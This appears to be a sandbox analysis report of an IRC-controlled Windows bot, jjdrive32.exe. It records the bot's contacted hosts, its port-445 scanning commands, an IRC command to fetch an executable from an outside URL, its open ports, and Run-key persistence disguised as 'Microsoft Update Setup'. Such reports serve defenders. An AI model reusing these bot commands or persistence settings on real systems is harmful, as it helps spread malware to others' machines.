195.190.13.163(hub.us.com)

Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
195.190.13.163 47221

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi

MODE [N00_USA_XP_2766612]
@ -ix
PRIVMSG [N00_USA_XP_2766
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #g -ix
MODE #sa -ix
PRIVMSG #r :HTTP SET http://zonetech.info/61.exe

Other details

* The following ports were open in the system:

Port Protocol Process
1053 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
1056 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
1057 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
1087 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
1464 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2264 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2265 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2266 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2267 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2268 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2269 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2270 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2271 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2272 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2273 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2274 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2275 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2276 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2277 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2278 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2279 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2280 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2281 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2282 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2283 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2284 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2285 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2286 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2287 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2288 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2289 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2290 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2291 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2292 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2293 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2294 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2295 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2296 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2297 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2298 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2299 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2300 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2301 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2302 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2303 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2304 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2305 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2306 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2307 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2308 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2309 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2310 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2311 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2312 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2313 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2314 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2315 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2316 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2317 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2318 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2319 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2320 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2321 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2322 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2323 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2324 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2325 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2326 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2327 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2328 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2329 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2330 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2331 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2332 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2333 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2334 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2335 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2336 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2337 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2338 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2339 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2340 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2341 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2342 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2343 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2344 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2345 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2346 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2347 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2348 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2349 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2350 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2351 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2352 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2353 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2354 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2355 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2356 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2357 TCP jjdrive32.exe (%Windir%jjdrive32.exe)
2358 TCP jjdrive32.exe (%Windir%jjdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Update Setup = “%Windir%jjdrive32.exe”

so that jjdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Update Setup = “%Windir%jjdrive32.exe”

so that jjdrive32.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
jjdrive32.exe %Windir%jjdrive32.exe 339 968 bytes

* Note:
o %Windir% is a variable that refers to the Windows installation folder. By default, this is C:Windows or C:Winnt

Categories: Uncategorized